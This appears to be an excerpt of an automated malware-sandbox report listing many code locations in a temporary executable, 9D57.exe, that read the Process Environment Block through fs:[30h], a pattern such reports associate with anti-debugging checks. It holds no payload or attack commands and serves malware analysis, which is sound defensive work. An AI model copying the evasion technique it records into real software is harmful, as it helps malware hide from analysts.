Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3049A4 mov eax, dword ptr fs:[00000030h] 23_2_6D3049A4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3049A4 mov eax, dword ptr fs:[00000030h] 23_2_6D3049A4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3049A4 mov eax, dword ptr fs:[00000030h] 23_2_6D3049A4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27C9BF mov eax, dword ptr fs:[00000030h] 23_2_6D27C9BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27C9BF mov eax, dword ptr fs:[00000030h] 23_2_6D27C9BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov eax, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov eax, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov eax, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov ecx, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF mov eax, dword ptr fs:[00000030h] 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27A185 mov eax, dword ptr fs:[00000030h] 23_2_6D27A185
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26C182 mov eax, dword ptr fs:[00000030h] 23_2_6D26C182
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274190 mov eax, dword ptr fs:[00000030h] 23_2_6D274190
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D272990 mov eax, dword ptr fs:[00000030h] 23_2_6D272990
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30A189 mov eax, dword ptr fs:[00000030h] 23_2_6D30A189
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30A189 mov ecx, dword ptr fs:[00000030h] 23_2_6D30A189
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24519E mov eax, dword ptr fs:[00000030h] 23_2_6D24519E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24519E mov ecx, dword ptr fs:[00000030h] 23_2_6D24519E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2431E0 mov eax, dword ptr fs:[00000030h] 23_2_6D2431E0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D41E8 mov eax, dword ptr fs:[00000030h] 23_2_6D2D41E8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B1E1 mov eax, dword ptr fs:[00000030h] 23_2_6D24B1E1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B1E1 mov eax, dword ptr fs:[00000030h] 23_2_6D24B1E1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B1E1 mov eax, dword ptr fs:[00000030h] 23_2_6D24B1E1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E9ED mov eax, dword ptr fs:[00000030h] 23_2_6D24E9ED
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3189E7 mov eax, dword ptr fs:[00000030h] 23_2_6D3189E7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2599C7 mov eax, dword ptr fs:[00000030h] 23_2_6D2599C7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2599C7 mov eax, dword ptr fs:[00000030h] 23_2_6D2599C7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2599C7 mov eax, dword ptr fs:[00000030h] 23_2_6D2599C7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2599C7 mov eax, dword ptr fs:[00000030h] 23_2_6D2599C7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274020 mov edi, dword ptr fs:[00000030h] 23_2_6D274020
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25B02A mov eax, dword ptr fs:[00000030h] 23_2_6D25B02A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25B02A mov eax, dword ptr fs:[00000030h] 23_2_6D25B02A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25B02A mov eax, dword ptr fs:[00000030h] 23_2_6D25B02A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25B02A mov eax, dword ptr fs:[00000030h] 23_2_6D25B02A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A830 mov eax, dword ptr fs:[00000030h] 23_2_6D26A830
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A830 mov eax, dword ptr fs:[00000030h] 23_2_6D26A830
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A830 mov eax, dword ptr fs:[00000030h] 23_2_6D26A830
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A830 mov eax, dword ptr fs:[00000030h] 23_2_6D26A830
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D314015 mov eax, dword ptr fs:[00000030h] 23_2_6D314015
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D314015 mov eax, dword ptr fs:[00000030h] 23_2_6D314015
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D246800 mov eax, dword ptr fs:[00000030h] 23_2_6D246800
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D246800 mov eax, dword ptr fs:[00000030h] 23_2_6D246800
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D246800 mov eax, dword ptr fs:[00000030h] 23_2_6D246800
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D258800 mov eax, dword ptr fs:[00000030h] 23_2_6D258800
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D31F019 mov eax, dword ptr fs:[00000030h] 23_2_6D31F019
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D31F019 mov eax, dword ptr fs:[00000030h] 23_2_6D31F019
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E009 mov eax, dword ptr fs:[00000030h] 23_2_6D24E009
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F018 mov eax, dword ptr fs:[00000030h] 23_2_6D24F018
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F018 mov eax, dword ptr fs:[00000030h] 23_2_6D24F018
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D302073 mov eax, dword ptr fs:[00000030h] 23_2_6D302073
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D311074 mov eax, dword ptr fs:[00000030h] 23_2_6D311074
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26F86D mov eax, dword ptr fs:[00000030h] 23_2_6D26F86D
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D247055 mov eax, dword ptr fs:[00000030h] 23_2_6D247055
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245050 mov eax, dword ptr fs:[00000030h] 23_2_6D245050
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245050 mov eax, dword ptr fs:[00000030h] 23_2_6D245050
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245050 mov eax, dword ptr fs:[00000030h] 23_2_6D245050
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2538A4 mov eax, dword ptr fs:[00000030h] 23_2_6D2538A4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2538A4 mov ecx, dword ptr fs:[00000030h] 23_2_6D2538A4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2890AF mov eax, dword ptr fs:[00000030h] 23_2_6D2890AF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528AE mov eax, dword ptr fs:[00000030h] 23_2_6D2528AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528AE mov eax, dword ptr fs:[00000030h] 23_2_6D2528AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528AE mov eax, dword ptr fs:[00000030h] 23_2_6D2528AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528AE mov ecx, dword ptr fs:[00000030h] 23_2_6D2528AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528AE mov eax, dword ptr fs:[00000030h] 23_2_6D2528AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528AE mov eax, dword ptr fs:[00000030h] 23_2_6D2528AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E8B0 mov eax, dword ptr fs:[00000030h] 23_2_6D24E8B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E8B0 mov eax, dword ptr fs:[00000030h] 23_2_6D24E8B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E8B0 mov eax, dword ptr fs:[00000030h] 23_2_6D24E8B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E8B0 mov eax, dword ptr fs:[00000030h] 23_2_6D24E8B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E8B0 mov eax, dword ptr fs:[00000030h] 23_2_6D24E8B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E8B0 mov eax, dword ptr fs:[00000030h] 23_2_6D24E8B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27F0BF mov ecx, dword ptr fs:[00000030h] 23_2_6D27F0BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27F0BF mov eax, dword ptr fs:[00000030h] 23_2_6D27F0BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27F0BF mov eax, dword ptr fs:[00000030h] 23_2_6D27F0BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D243880 mov eax, dword ptr fs:[00000030h] 23_2_6D243880
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D243880 mov eax, dword ptr fs:[00000030h] 23_2_6D243880
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3884 mov eax, dword ptr fs:[00000030h] 23_2_6D2C3884
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3884 mov eax, dword ptr fs:[00000030h] 23_2_6D2C3884
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26B8E4 mov eax, dword ptr fs:[00000030h] 23_2_6D26B8E4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26B8E4 mov eax, dword ptr fs:[00000030h] 23_2_6D26B8E4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2440E1 mov eax, dword ptr fs:[00000030h] 23_2_6D2440E1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2440E1 mov eax, dword ptr fs:[00000030h] 23_2_6D2440E1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2440E1 mov eax, dword ptr fs:[00000030h] 23_2_6D2440E1
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FE0E9 mov eax, dword ptr fs:[00000030h] 23_2_6D2FE0E9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FE0E9 mov eax, dword ptr fs:[00000030h] 23_2_6D2FE0E9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2458EC mov eax, dword ptr fs:[00000030h] 23_2_6D2458EC
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528FD mov eax, dword ptr fs:[00000030h] 23_2_6D2528FD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528FD mov eax, dword ptr fs:[00000030h] 23_2_6D2528FD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2528FD mov eax, dword ptr fs:[00000030h] 23_2_6D2528FD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2470C0 mov eax, dword ptr fs:[00000030h] 23_2_6D2470C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2470C0 mov eax, dword ptr fs:[00000030h] 23_2_6D2470C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D4320 mov eax, dword ptr fs:[00000030h] 23_2_6D2D4320
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FE33D mov eax, dword ptr fs:[00000030h] 23_2_6D2FE33D
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30131B mov eax, dword ptr fs:[00000030h] 23_2_6D30131B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 mov eax, dword ptr fs:[00000030h] 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24DB60 mov ecx, dword ptr fs:[00000030h] 23_2_6D24DB60
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D6365 mov eax, dword ptr fs:[00000030h] 23_2_6D2D6365
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D6365 mov eax, dword ptr fs:[00000030h] 23_2_6D2D6365
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D6365 mov eax, dword ptr fs:[00000030h] 23_2_6D2D6365
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B7A mov eax, dword ptr fs:[00000030h] 23_2_6D273B7A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B7A mov eax, dword ptr fs:[00000030h] 23_2_6D273B7A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F340 mov eax, dword ptr fs:[00000030h] 23_2_6D24F340
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24DB40 mov eax, dword ptr fs:[00000030h] 23_2_6D24DB40
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318B58 mov eax, dword ptr fs:[00000030h] 23_2_6D318B58
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F358 mov eax, dword ptr fs:[00000030h] 23_2_6D24F358
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B5A mov eax, dword ptr fs:[00000030h] 23_2_6D273B5A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B5A mov eax, dword ptr fs:[00000030h] 23_2_6D273B5A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B5A mov eax, dword ptr fs:[00000030h] 23_2_6D273B5A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B5A mov eax, dword ptr fs:[00000030h] 23_2_6D273B5A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318BB6 mov eax, dword ptr fs:[00000030h] 23_2_6D318BB6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274BAD mov eax, dword ptr fs:[00000030h] 23_2_6D274BAD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274BAD mov eax, dword ptr fs:[00000030h] 23_2_6D274BAD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274BAD mov eax, dword ptr fs:[00000030h] 23_2_6D274BAD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D319BBE mov eax, dword ptr fs:[00000030h] 23_2_6D319BBE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301BA8 mov eax, dword ptr fs:[00000030h] 23_2_6D301BA8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2EEB8A mov ecx, dword ptr fs:[00000030h] 23_2_6D2EEB8A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2EEB8A mov eax, dword ptr fs:[00000030h] 23_2_6D2EEB8A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2EEB8A mov eax, dword ptr fs:[00000030h] 23_2_6D2EEB8A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2EEB8A mov eax, dword ptr fs:[00000030h] 23_2_6D2EEB8A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D251B8F mov eax, dword ptr fs:[00000030h] 23_2_6D251B8F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D251B8F mov eax, dword ptr fs:[00000030h] 23_2_6D251B8F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FD380 mov ecx, dword ptr fs:[00000030h] 23_2_6D2FD380
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244B94 mov edi, dword ptr fs:[00000030h] 23_2_6D244B94
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F395 mov eax, dword ptr fs:[00000030h] 23_2_6D24F395
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30138A mov eax, dword ptr fs:[00000030h] 23_2_6D30138A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F23E3 mov ecx, dword ptr fs:[00000030h] 23_2_6D2F23E3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F23E3 mov ecx, dword ptr fs:[00000030h] 23_2_6D2F23E3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F23E3 mov eax, dword ptr fs:[00000030h] 23_2_6D2F23E3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D241BE9 mov eax, dword ptr fs:[00000030h] 23_2_6D241BE9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26DBE9 mov eax, dword ptr fs:[00000030h] 23_2_6D26DBE9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253BF4 mov eax, dword ptr fs:[00000030h] 23_2_6D253BF4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D253BF4 mov ecx, dword ptr fs:[00000030h] 23_2_6D253BF4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2423F6 mov eax, dword ptr fs:[00000030h] 23_2_6D2423F6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C53CA mov eax, dword ptr fs:[00000030h] 23_2_6D2C53CA
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C53CA mov eax, dword ptr fs:[00000030h] 23_2_6D2C53CA
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244A20 mov eax, dword ptr fs:[00000030h] 23_2_6D244A20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244A20 mov eax, dword ptr fs:[00000030h] 23_2_6D244A20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2CEA20 mov eax, dword ptr fs:[00000030h] 23_2_6D2CEA20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 mov eax, dword ptr fs:[00000030h] 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D248239 mov eax, dword ptr fs:[00000030h] 23_2_6D248239
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D248239 mov eax, dword ptr fs:[00000030h] 23_2_6D248239
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D248239 mov eax, dword ptr fs:[00000030h] 23_2_6D248239
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FD208 mov eax, dword ptr fs:[00000030h] 23_2_6D2FD208
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FD208 mov eax, dword ptr fs:[00000030h] 23_2_6D2FD208
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D258A0A mov eax, dword ptr fs:[00000030h] 23_2_6D258A0A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245210 mov eax, dword ptr fs:[00000030h] 23_2_6D245210
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245210 mov ecx, dword ptr fs:[00000030h] 23_2_6D245210
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245210 mov eax, dword ptr fs:[00000030h] 23_2_6D245210
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245210 mov eax, dword ptr fs:[00000030h] 23_2_6D245210
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D263A1C mov eax, dword ptr fs:[00000030h] 23_2_6D263A1C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FB260 mov eax, dword ptr fs:[00000030h] 23_2_6D2FB260
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FB260 mov eax, dword ptr fs:[00000030h] 23_2_6D2FB260
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28927A mov eax, dword ptr fs:[00000030h] 23_2_6D28927A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318A62 mov eax, dword ptr fs:[00000030h] 23_2_6D318A62
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242240 mov ecx, dword ptr fs:[00000030h] 23_2_6D242240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242240 mov eax, dword ptr fs:[00000030h] 23_2_6D242240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249240 mov eax, dword ptr fs:[00000030h] 23_2_6D249240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249240 mov eax, dword ptr fs:[00000030h] 23_2_6D249240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249240 mov eax, dword ptr fs:[00000030h] 23_2_6D249240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249240 mov eax, dword ptr fs:[00000030h] 23_2_6D249240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D4248 mov eax, dword ptr fs:[00000030h] 23_2_6D2D4248
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D4257 mov eax, dword ptr fs:[00000030h] 23_2_6D2D4257
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2452A5 mov eax, dword ptr fs:[00000030h] 23_2_6D2452A5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2452A5 mov eax, dword ptr fs:[00000030h] 23_2_6D2452A5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2452A5 mov eax, dword ptr fs:[00000030h] 23_2_6D2452A5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2452A5 mov eax, dword ptr fs:[00000030h] 23_2_6D2452A5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2452A5 mov eax, dword ptr fs:[00000030h] 23_2_6D2452A5
